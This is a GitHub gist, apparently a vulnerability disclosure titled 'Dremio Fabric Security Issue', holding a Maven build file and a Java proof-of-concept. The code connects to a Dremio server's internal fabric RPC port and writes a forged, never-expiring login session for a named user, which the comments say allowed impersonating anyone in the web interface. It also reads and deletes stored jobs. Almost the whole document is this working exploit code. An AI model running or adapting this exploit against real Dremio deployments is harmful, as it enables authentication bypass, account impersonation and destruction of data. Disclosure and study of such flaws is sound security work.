-
-
Save patricker/4bf3d668b301e0872a7ff994c5c82683 to your computer and use it in GitHub Desktop.
Dremio Fabric Security Issue
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project xmlns="http://maven.apache.org/POM/4.0.0" | |
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> | |
<modelVersion>4.0.0</modelVersion> | |
<groupId>com.micron.dremio</groupId> | |
<artifactId>security-test</artifactId> | |
<version>1.0-SNAPSHOT</version> | |
<dependencies> | |
<dependency> | |
<groupId>com.dremio</groupId> | |
<artifactId>dremio-common</artifactId> | |
<version>4.0.0-201909121834570395-c7a5071</version> | |
</dependency> | |
<dependency> | |
<groupId>com.dremio.services</groupId> | |
<artifactId>dremio-services-fabric-rpc</artifactId> | |
<version>4.0.0-201909121834570395-c7a5071</version> | |
</dependency> | |
<dependency> | |
<groupId>com.dremio.services</groupId> | |
<artifactId>dremio-services-namespace</artifactId> | |
<version>4.0.0-201909121834570395-c7a5071</version> | |
</dependency> | |
<dependency> | |
<groupId>com.dremio.services</groupId> | |
<artifactId>dremio-services-datastore</artifactId> | |
<version>4.0.0-201909121834570395-c7a5071</version> | |
</dependency> | |
<dependency> | |
<groupId>com.dremio</groupId> | |
<artifactId>dremio-dac-backend</artifactId> | |
<version>4.0.0-201909121834570395-c7a5071</version> | |
</dependency> | |
</dependencies> | |
<build> | |
<plugins> | |
<plugin> | |
<groupId>org.apache.maven.plugins</groupId> | |
<artifactId>maven-compiler-plugin</artifactId> | |
<configuration> | |
<source>1.8</source> | |
<target>1.8</target> | |
</configuration> | |
</plugin> | |
</plugins> | |
</build> | |
</project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.dremio.services.fabric; | |
import com.dremio.common.VM; | |
import com.dremio.common.config.SabotConfig; | |
import com.dremio.common.memory.DremioRootAllocator; | |
import com.dremio.common.scanner.ClassPathScanner; | |
import com.dremio.common.scanner.persistence.ScanResult; | |
import com.dremio.dac.proto.model.tokens.SessionState; | |
import com.dremio.dac.server.tokens.TokenStoreCreator; | |
import com.dremio.datastore.IndexedStore; | |
import com.dremio.datastore.KVStore; | |
import com.dremio.datastore.RemoteKVStoreProvider; | |
import com.dremio.datastore.SearchQueryUtils; | |
import com.dremio.exec.proto.CoordinationProtos; | |
import com.dremio.exec.rpc.CloseableThreadPool; | |
import com.dremio.service.job.proto.JobId; | |
import com.dremio.service.job.proto.JobResult; | |
import com.dremio.service.jobs.LocalJobsService; | |
import com.dremio.services.fabric.api.FabricService; | |
import org.apache.arrow.memory.BufferAllocator; | |
import java.math.BigInteger; | |
import java.security.SecureRandom; | |
import java.util.Map; | |
public class SecurityRunner { | |
private static ScanResult PRESCANNED = ClassPathScanner.fromPrescan(SabotConfig.create()); | |
private static final CloseableThreadPool pool = new CloseableThreadPool("dremio-security-test"); | |
private static final DremioRootAllocator rootAllocator = | |
DremioRootAllocator.create(VM.getMaxDirectMemory(), Long.MAX_VALUE); | |
private static final BufferAllocator allocator = rootAllocator.newChildAllocator("child-allocator", 0, Long.MAX_VALUE); | |
public static void main(String[] args) throws Exception { | |
final FabricService fabricService = new FabricServiceImpl("localhost", 45678, true, | |
2, allocator, 0, Long.MAX_VALUE, 0, pool); | |
fabricService.start(); | |
// Take the easy way out and just use the RemoteKVStoreProvider | |
final RemoteKVStoreProvider remoteKVStoreProvider = | |
new RemoteKVStoreProvider(PRESCANNED, | |
() -> getMasterEndpoint(), | |
() -> fabricService, | |
allocator, | |
"localhost"); | |
remoteKVStoreProvider.start(); | |
// Ex 1: Lets create a token for logging into the website by directly inserting a token into the Token Store | |
// Conveniently this token "never" expires | |
// NOTE: I tested this locally, and was able to put in the JSON into the "Local Storage" for the webpage | |
// Using Chrome Developer tools and impersonate anyone I want. | |
// NOTE 2: In the case of SimpleAuthentication, I could just create a new account and login too. | |
{ | |
KVStore<String, SessionState> tokenStore = remoteKVStoreProvider.getStore(TokenStoreCreator.class); | |
final String token = new BigInteger(130, new SecureRandom()).toString(32); | |
final SessionState state = new SessionState() | |
.setUsername("pwicks") | |
.setClientAddress("localhost") | |
.setIssuedAt(System.currentTimeMillis()) | |
.setExpiresAt(Long.MAX_VALUE); | |
tokenStore.put(token, state); | |
System.out.println("Token: " + token + ", Session: " + state); | |
} | |
// Ex 2: Lets find/delete some jobs | |
{ | |
final IndexedStore<JobId, JobResult> store = remoteKVStoreProvider.getStore(LocalJobsService.JobsStoreCreator.class); | |
final IndexedStore.FindByCondition condition = new IndexedStore.FindByCondition() | |
.setCondition(SearchQueryUtils.newMatchAllQuery()) | |
.setLimit(2); | |
final Iterable<Map.Entry<JobId, JobResult>> entries = store.find(condition); | |
for (Map.Entry<JobId, JobResult> e : entries) { | |
System.out.println(e.getKey().toString() + " - " + e.getValue().toString()); | |
// Delete the job | |
store.delete(e.getKey()); | |
System.out.println("Deleted Job with ID: " + e.getKey().toString()); | |
} | |
} | |
remoteKVStoreProvider.close(); | |
fabricService.close(); | |
} | |
public static CoordinationProtos.NodeEndpoint getMasterEndpoint(){ | |
return CoordinationProtos.NodeEndpoint.newBuilder() | |
.setAddress("!HOSTNAME_HERE!") | |
.setFabricPort(45678) | |
.build(); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment